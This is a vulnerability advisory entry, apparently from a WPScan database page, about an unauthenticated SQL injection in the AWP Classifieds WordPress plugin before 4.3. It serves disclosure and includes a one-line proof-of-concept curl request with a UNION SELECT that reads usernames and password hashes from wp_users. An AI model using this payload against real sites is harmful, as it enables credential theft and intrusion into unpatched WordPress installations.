Lucene search

K
wpvulndbCydaveWPVDB-ID:546C47C2-5B4B-46DB-B754-C6B43AEF2660
HistoryOct 10, 2022 - 12:00 a.m.

AWP Classifieds Plugin < 4.3 - Unauthenticated SQLi

2022-10-1000:00:00
cydave
wpscan.com
7

0.002 Low

EPSS

Percentile

57.6%

The plugin does not properly sanitise and escape some parameters before using them in a SQL statement via an AJAX action available to unauthenticated users and when a specific premium module is active, leading to a SQL injection

PoC

To read the user_login and user_pass columns from the wp_users table: curl -i ‘https://example.com/wp-admin/admin-ajax.php?action=awpcp-get-regions-options&amp;parent;_type=country&amp;context;=search&amp;parent;=Algeria&amp;type;=user_login`+FROM+wp_users+UNION+ALL+SELECT+user_pass+FROM+wp_users;--+-

0.002 Low

EPSS

Percentile

57.6%

Related for WPVDB-ID:546C47C2-5B4B-46DB-B754-C6B43AEF2660